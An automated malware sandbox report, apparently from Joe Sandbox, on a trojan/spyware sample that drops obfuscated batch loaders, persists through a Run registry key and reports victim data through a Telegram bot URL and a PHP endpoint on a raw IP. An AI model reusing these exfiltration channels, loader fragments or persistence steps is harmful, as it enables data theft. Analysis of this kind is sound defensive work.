00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027AC1000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025ED1000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	nhpoymuP.pif, 00000007.00000002.2966303963.0000000027B74000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027B7F000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027B2F000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027BA7000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025FBE000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025F4E000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025F94000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	nhpoymuP.pif, 00000007.00000002.2966303963.0000000027B74000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027B7F000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027BA7000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027AC1000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025FBE000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025F24000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025F94000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:138727%0D%0ADate%20a	nhpoymuP.pif, 00000007.00000002.2966303963.0000000027BA7000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025FBE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E9E000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028C56000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028D81000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028CA0000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028AC7000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028C2B000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.000000002703B000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027191000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027066000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000272AE000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000026ED7000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000270B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fodoknotel.za.com/d	image.exe, 00000000.00000002.1711881761.000000000084B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E46000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E14000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027224000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027256000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0C	image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	nhpoymuP.pif, 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.91.198.176	mail.techniqueqatar.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	true
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
23.237.26.135	fodoknotel.za.com	United States	174	COGENT-174US	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	false
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583390
Start date and time:	2025-01-02 16:04:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	image.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@21/8@5/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 159 Number of non-executed functions: 77
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: image.exe

Simulations

Behavior and APIs

Time	Type	Description
10:04:56	API Interceptor	2x Sleep call for process: image.exe modified
10:05:11	API Interceptor	4x Sleep call for process: Pumyophn.PIF modified
10:05:25	API Interceptor	1584662x Sleep call for process: nhpoymuP.pif modified
15:04:48	Task Scheduler	Run new task: {D9A0E16A-D1D9-48B2-8661-3799DE5CE30B} path: .
15:05:02	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Pumyophn C:\Users\Public\Pumyophn.url
15:05:11	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Pumyophn C:\Users\Public\Pumyophn.url

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.91.198.176	grace.exe	Get hash	malicious	AgentTesla	Browse
208.91.198.176	RTGS-WB-ABS-240730-NEW.lnk	Get hash	malicious	AgentTesla	Browse
149.154.167.220	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	mcgen.exe	Get hash	malicious	Blank Grabber	Browse
	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	Etqq32Yuw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse
	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	XClient.exe	Get hash	malicious	XWorm	Browse
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
23.237.26.135	LACTALIS SECURED 03-13-2024.htm	Get hash	malicious	Unknown	Browse
	https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3D#/?/#/?/bfariss@onedigital.com	Get hash	malicious	Unknown	Browse
	https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3D#/?/%23/?/marketing@virtualintelligencebriefing.com	Get hash	malicious	Unknown	Browse
188.114.97.3	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	/api/get/free
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	/api/get/free
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.rgenerousrs.store/o362/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.beylikduzu616161.xyz/2nga/
	Delivery_Notification_00000260791.doc.js	Get hash	malicious	Unknown	Browse	radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
	ce.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/lxvbq
	Label_00000852555.doc.js	Get hash	malicious	Unknown	Browse	tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
	PO 20495088.exe	Get hash	malicious	FormBook	Browse	www.ssrnoremt-rise.sbs/3jsc/
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/zWkbOqX7/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	Dotc67890990.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.67.177.134
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	HALKBANK EKSTRE.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	EPIRTURMEROOO0060.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
checkip.dyndns.com	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	ZOYGRL1ePa.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	158.101.44.242
	Dotc67890990.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	HALKBANK EKSTRE.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
api.telegram.org	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	mcgen.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	Etqq32Yuw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	149.154.167.220
	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	XClient.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	mcgen.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Etqq32Yuw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	over.ps1	Get hash	malicious	Vidar	Browse	149.154.167.99
	MatAugust.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	149.154.167.220
PUBLIC-DOMAIN-REGISTRYUS	YinLHGpoX4.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	103.53.42.63
	v4BET4inNV.vbs	Get hash	malicious	GuLoader	Browse	103.53.42.63
	InvoiceNr274728.pdf.lnk	Get hash	malicious	LummaC	Browse	208.91.198.106
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	119.18.54.39
	List of required items and services pdf.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	103.53.42.63
	s0zqlmETpm.lnk	Get hash	malicious	Unknown	Browse	216.10.240.70
	Quote_8714.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	S1a5ZF3ytp.vbs	Get hash	malicious	GuLoader	Browse	103.53.42.63
	List of required items pdf.vbs	Get hash	malicious	GuLoader	Browse	103.53.42.63
	List of required items and services pdf.vbs	Get hash	malicious	GuLoader	Browse	103.53.42.63
COGENT-174US	DEMONS.sh4.elf	Get hash	malicious	Unknown	Browse	38.178.222.247
	inv#12180.exe	Get hash	malicious	FormBook	Browse	154.21.203.24
	armv5l.elf	Get hash	malicious	Unknown	Browse	66.250.145.99
	armv4l.elf	Get hash	malicious	Unknown	Browse	216.28.35.187
	PQ2.exe	Get hash	malicious	Mimikatz	Browse	38.6.164.159
	http://www.rr8844.com	Get hash	malicious	Unknown	Browse	149.104.32.188
	DF2.exe	Get hash	malicious	Unknown	Browse	38.40.94.251
	loligang.arm.elf	Get hash	malicious	Mirai	Browse	149.104.166.231
	loligang.sh4.elf	Get hash	malicious	Mirai	Browse	154.22.36.201
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	149.38.61.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	NL Hybrid.exe	Get hash	malicious	Titanium Proxy, PureLog Stealer	Browse	188.114.97.3
	NL Hybrid.exe	Get hash	malicious	Titanium Proxy, PureLog Stealer	Browse	188.114.97.3
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	RtU8kXPnKr.exe	Get hash	malicious	Quasar	Browse	188.114.97.3
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Dotc67890990.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	NOTIFICATION_OF_DEPENDANTS_1.vbs	Get hash	malicious	Xmrig	Browse	149.154.167.220
	CRf9KBk4ra.exe	Get hash	malicious	DCRat	Browse	149.154.167.220
	7FEGBYFBHFBJH32.exe	Get hash	malicious	44Caliber Stealer, BlackGuard, Rags Stealer	Browse	149.154.167.220
	test.doc.bin.doc	Get hash	malicious	Unknown	Browse	149.154.167.220
	web44.mp4.hta	Get hash	malicious	LummaC	Browse	149.154.167.220
	test.doc.bin.doc	Get hash	malicious	Unknown	Browse	149.154.167.220
	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	1.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220
a0e9f5d64349fb13191bc781f81f42e1	MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip	Get hash	malicious	Unknown	Browse	23.237.26.135
	MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip	Get hash	malicious	Unknown	Browse	23.237.26.135
	MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip	Get hash	malicious	Unknown	Browse	23.237.26.135
	Setup.exe.7z	Get hash	malicious	Unknown	Browse	23.237.26.135
	176.113.115.170.ps1	Get hash	malicious	LummaC	Browse	23.237.26.135
	ETVk1yP43q.exe	Get hash	malicious	AZORult	Browse	23.237.26.135
	UhsjR3ZFTD.exe	Get hash	malicious	LummaC	Browse	23.237.26.135
	KRNL.exe	Get hash	malicious	LummaC	Browse	23.237.26.135
	Setup.exe	Get hash	malicious	LummaC	Browse	23.237.26.135
	SET_UP.exe	Get hash	malicious	LummaC	Browse	23.237.26.135

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Libraries\nhpoymuP.pif	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse
	Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe	Get hash	malicious	DBatLoader, FormBook	Browse
	Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe	Get hash	malicious	DBatLoader, FormBook	Browse
	RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe	Get hash	malicious	DBatLoader, FormBook	Browse
	Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Get hash	malicious	DBatLoader, FormBook	Browse
	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse
	qDKTsL1y44.exe	Get hash	malicious	DBatLoader	Browse
	PRODUCT.bat	Get hash	malicious	AveMaria, DBatLoader, UACMe	Browse
	purchaseorder.bat	Get hash	malicious	AveMaria, DBatLoader, UACMe	Browse

Created / dropped Files

C:\Users\Public\Libraries\FX.cmd

Download File

Process:	C:\Users\user\Desktop\image.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	8556
Entropy (8bit):	4.623706637784657
Encrypted:	false
SSDEEP:	192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
MD5:	60CD0BE570DECD49E4798554639A05AE
SHA1:	BD7BED69D9AB9A20B5263D74921C453F38477BCB
SHA-256:	CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
SHA-512:	AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
Malicious:	true
Preview:	@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%

C:\Users\Public\Libraries\NEO.cmd

Download File

Process:	C:\Users\user\Desktop\image.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
Category:	dropped
Size (bytes):	46543
Entropy (8bit):	4.705001079878445
Encrypted:	false
SSDEEP:	768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
MD5:	637A66953F03B084808934ED7DF7192F
SHA1:	D3AE40DFF4894972A141A631900BD3BB8C441696
SHA-256:	41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
SHA-512:	2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
Malicious:	false
Preview:	@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .

C:\Users\Public\Libraries\Pumyophn

Download File

Process:	C:\Users\user\Desktop\image.exe
File Type:	data
Category:	dropped
Size (bytes):	574971
Entropy (8bit):	7.297176055661517
Encrypted:	false
SSDEEP:	12288:Q5bKXmZRx3G8vBoSUQsLDjXwLIMn0h8OYRBl3VjUcSxxi1nHW8:QtK8cK0fYXvjUtxs1nZ
MD5:	26622661AD22FDCDCDED07D05849F80C
